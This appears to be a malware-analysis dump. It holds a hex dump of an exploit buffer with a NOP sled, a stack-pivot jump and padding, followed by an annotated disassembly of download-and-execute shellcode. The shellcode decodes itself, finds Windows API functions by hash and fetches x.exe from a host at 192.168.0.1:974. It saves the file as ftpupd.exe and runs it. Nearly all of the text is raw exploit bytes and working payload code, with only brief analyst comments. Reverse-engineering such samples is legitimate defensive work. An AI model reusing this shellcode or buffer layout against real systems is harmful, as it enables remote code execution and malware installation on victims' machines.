90 - 90 90 90 90 90 90 90 90 ........ ........ 000005f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000600: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000610: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000620: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000630: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000640: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000650: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000660: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000670: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000680: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000690: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000700: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000710: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000720: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000730: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000740: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000750: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000760: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000770: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000780: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000790: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000800: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000810: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000820: 90 90 90 90 90 90 90 90 - 00 46 00 01 90 90 90 90 ........ .F...... 00000830: 90 90 90 90 90 90 90 90 - 66 81 ec 1c 07 ff e4 90 ........ f....... 00000840: 90 90 90 90 90 90 90 90 - 90 90 90 90 95 14 40 00 ........ ........ 00000850: 03 00 00 00 7c 70 40 00 - 01 00 00 00 00 00 00 00 .....p.. ........ 00000860: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 00000870: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 00000880: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 00000890: 01 00 00 00 00 00 00 00 - 7c 70 40 00 01 00 00 00 ........ .p...... 000008a0: 00 00 00 00 01 00 00 00 - 00 00 00 00 7c 70 40 00 ........ .....p.. 000008b0: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 000008c0: 7c 70 40 00 01 00 00 00 - 00 00 00 00 01 00 00 00 .p...... ........ 000008d0: 00 00 00 00 78 85 13 00 - ab 5b a6 e9 31 31 31 31 ....x... ....1111 000008e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000008f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000900: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000910: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000920: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000930: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000940: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000950: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000960: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000970: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000980: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000990: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009a0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009b0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009c0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009d0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000aa0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ab0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ac0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ad0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ae0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000af0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ba0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000be0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bf0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ca0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ce0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cf0: 31 31 31 31 31 31 31 00 - 00 1111111. .
0000015F loc_15F: 0000015F pop ebp 00000160 xor ecx, ecx 00000162 mov cx, 1F1h 00000166 00000166 loc_166: 00000166 lea esi, [ebp+5] 00000169 mov edi, esi 0000016B 0000016B loc_16B: 0000016B mov al, [esi] 0000016D 0000016D loc_16D: 0000016D cmp al, 99h ; 'Ö' 0000016F jnz short loc_176 00000171 inc esi 00000172 mov al, [esi] 00000174 sub al, 30h ; '0' 00000176 00000176 loc_176: 00000176 inc esi 00000177 xor al, 99h 00000179 mov [edi], al 0000017B inc edi 0000017C loop loc_16B 0000017E jmp short loc_18A 00000180 ; --------------------------------------------------------------------------- 00000180 call loc_15F
0000011E aHttrrrrrrrrrrp192_ db 'httÉÉÉÉÉÉÉÉÉÉp://192.168.0.1:974/x.exe',0 00000145 db 0DFh ; ¯ ; URL is broken 00000146 db 0DFh ; ¯ 00000147 db 0DFh ; ¯ 00000148 db 0DFh ; ¯ 00000149 db 0DFh ; ¯ 0000014A db 0DFh ; ¯ 0000014B db 0DFh ; ¯ 0000014C db 0DFh ; ¯ 0000014D db 0DFh ; ¯ 0000014E db 0DFh ; ¯ 0000014F db 0DFh ; ¯ 00000150 db 0DFh ; ¯ 00000151 db 0DFh ; ¯ 00000152 db 0DFh ; ¯ 00000153 aMozilla4_0 db 'Mozilla/4.0',0 0000018A loc_18A: 0000018A call loc_199 0000018F mov esp, [esp+8] 00000193 pop dword ptr fs:[eax] 00000196 pop eax 00000197 jmp short loc_18A 00000199 ; --------------------------------------------------------------------------- 00000199 00000199 loc_199: 00000199 xor ebx, ebx 0000019B push dword ptr fs:[ebx] 0000019E mov fs:[ebx], esp 000001A1 lea eax, [ebp+130h] ; "u13.2i" 000001A7 push eax 000001A8 push 1 000001AA push 1F0001h 000001AF call CallProcKernel32 000001AF ; --------------------------------------------------------------------------- 000001B4 dd 0AE52C609h ; OpenMutexA 000001B8 ; --------------------------------------------------------------------------- 000001B8 or eax, eax 000001BA jnz loc_2A1 000001C0 lea edi, [ebp-32h] 000001C3 call sub_2AC ; remove DF byte after string at edi 000001C8 lea edi, [ebp-5Dh] 000001CB call sub_2AC 000001D0 push 4 000001D2 push 1000h 000001D7 push 50000h 000001DC push 0 000001DE call CallProcKernel32 000001DE ; --------------------------------------------------------------------------- 000001E3 dd 697A6AFEh ; VirtualAlloc 000001E7 ; --------------------------------------------------------------------------- 000001E7 mov [ebp+148h], eax ; pointer to reserved memory 000001ED sub eax, eax 000001EF push eax 000001F0 push eax 000001F1 push 2 000001F3 push eax 000001F4 push eax 000001F5 push 40000000h 000001FA lea ebx, [ebp+13Bh] ; .\ftpupd.exe 00000200 push ebx 00000201 call CallProcKernel32 00000201 ; --------------------------------------------------------------------------- 00000206 dd 8F8F114h ; CreateFileA 0000020A ; --------------------------------------------------------------------------- 0000020A mov [ebp+137h], eax ; file handle 00000210 cmp eax, 0FFFFFFFFh 00000213 jz loc_2A1 00000219 sub ecx, ecx 0000021B push ecx 0000021C push ecx 0000021D push ecx 0000021E push 1 00000220 lea eax, [ebp-32h] 00000223 push eax 00000224 call CallProcWininet 00000224 ; --------------------------------------------------------------------------- 00000229 dd 8593DD7h ; InternetOpenA 0000022D ; --------------------------------------------------------------------------- 0000022D mov edx, eax 0000022F or eax, eax 00000231 jz short loc_2A1 00000233 sub eax, eax 00000235 push eax 00000236 push eax 00000237 push eax 00000238 push eax 00000239 lea ebx, [ebp-5Dh] 0000023C push ebx 0000023D push edx 0000023E call CallProcWininet 0000023E ; --------------------------------------------------------------------------- 00000243 dd 0B87DBD66h ; InternetOpenURLA 00000247 ; --------------------------------------------------------------------------- 00000247 or eax, eax 00000249 jz short loc_2A1 0000024B push esp 0000024C push esp 0000024D push 50000h 00000252 push dword ptr [ebp+148h] 00000258 push eax 00000259 call CallProcWininet 00000259 ; --------------------------------------------------------------------------- 0000025E dd 1A212962h ; InternetReadFile 00000262 ; --------------------------------------------------------------------------- 00000262 pop edx 00000263 push esp 00000264 mov eax, esp 00000266 push 0 00000268 push eax 00000269 push edx 0000026A push dword ptr [ebp+148h] 00000270 push dword ptr [ebp+137h] 00000276 call CallProcKernel32 00000276 ; --------------------------------------------------------------------------- 0000027B dd 0F3FD1C3h ; WriteFile 0000027F ; --------------------------------------------------------------------------- 0000027F pop ecx 00000280 push dword ptr [ebp+137h] 00000286 call CallProcKernel32 00000286 ; --------------------------------------------------------------------------- 0000028B dd 723EB0D5h ; CloseHandle 0000028F ; --------------------------------------------------------------------------- 0000028F push 5 00000291 lea ebx, [ebp+13Bh] 00000297 push ebx 00000298 call CallProcKernel32 00000298 ; --------------------------------------------------------------------------- 0000029D dd 0E8BF6DADh ; WinExec 000002A1 ; --------------------------------------------------------------------------- 000002A1 000002A1 loc_2A1: 000002A1 push 0 000002A3 call CallProcKernel32 000002A3 ; --------------------------------------------------------------------------- 000002A8 dd 768AA260h ; ExitThread 000002AC 000002AC ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ 000002AC 000002AC 000002AC sub_2AC proc near 000002AC mov al, 0DFh ; '¯' 000002AE repne scasb 000002B0 mov byte ptr [edi-1], 0 000002B4 retn 000002B4 sub_2AC endp 000002B4 000002B4 ; --------------------------------------------------------------------------- 000002B5 aU13_2i db 'u13.2i',0 000002BC db 0 000002BD db 0 000002BE db 0 000002BF db 0 000002C0 a_Ftpupd_exe db '.\ftpupd.exe',0 000002CD db 0 000002CE db 0 000002CF db 0 000002D0 db 0 000002D1 db 0 000002D2 db 0 000002D3 db 0 000002D4 db 0 000002D5 db 0 000002D6 db 0 000002D7 db 0 000002D8 db 0 000002D9 aSleep db 'Sleep',0 000002DF aKernel32 db 'kernel32',0 000002E8 000002E8 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ 000002E8 000002E8 000002E8 CallProcWininet proc near 000002E8 pop esi 000002E9 lodsd 000002EA pusha 000002EB xor eax, eax 000002ED sub eax, 0FFB3B3BCh ; = 4C4C44 -> lld 000002F2 push eax 000002F3 xor eax, 2E18090Ah ; = 2E54454E -> .TEN 000002F8 push eax 000002F9 000002F9 loc_2F9: ; = 494E4957 -> INIW 000002F9 add eax, 1AFA0409h 000002FE push eax 000002FF push esp 00000300 call CallProcKernel32 00000300 ; --------------------------------------------------------------------------- 00000305 dd 0C8AC8026h ; LoadLibrary 00000309 ; --------------------------------------------------------------------------- 00000309 lea esp, [esp+0Ch] 0000030D xchg eax, ebx 0000030E jmp short loc_318 0000030E CallProcWininet endp 0000030E 00000310 00000310 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ 00000310 00000310 00000310 CallProcKernel32 proc near 00000310 pop esi 00000311 lodsd 00000312 pusha 00000313 call getKernel32Base 00000318 00000318 loc_318: 00000318 mov ecx, [ebx+3Ch] 0000031B mov ecx, [ecx+ebx+78h] 0000031F add ecx, ebx 00000321 xor esi, esi 00000323 00000323 loc_323: 00000323 lea edx, [ebx+esi*4] 00000326 add edx, [ecx+20h] 00000329 mov edx, [edx] 0000032B add edx, ebx 0000032D xor eax, eax 0000032F 0000032F loc_32F: 0000032F rol eax, 7 00000332 xor al, [edx] 00000334 inc edx 00000335 cmp byte ptr [edx], 0 00000338 jnz short loc_32F 0000033A cmp eax, [esp+1Ch] 0000033E jz short loc_347 00000340 inc esi 00000341 cmp esi, [ecx+18h] 00000344 jb short loc_323 00000346 int 3 ; Trap to Debugger 00000347 00000347 loc_347: 00000347 mov edx, [ecx+24h] 0000034A add edx, ebx 0000034C movzx edx, word ptr [edx+esi*2] 00000350 mov eax, [ecx+1Ch] 00000353 add eax, ebx 00000355 mov eax, [eax+edx*4] 00000358 add eax, ebx 0000035A mov [esp+1Ch], eax 0000035E popa 0000035F mov [ebp+14Ch], eax 00000365 call eax 00000367 jmp esi 00000367 CallProcKernel32 endp 00000367 00000369 00000369 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ 00000369 00000369 00000369 getKernel32Base proc near 00000369 mov ebx, fs:30h 0000036F mov ebx, [ebx+0Ch] 00000372 mov ebx, [ebx+1Ch] 00000375 mov ebx, [ebx] 00000377 mov ebx, [ebx+8] 0000037A retn 0000037A getKernel32Base endp
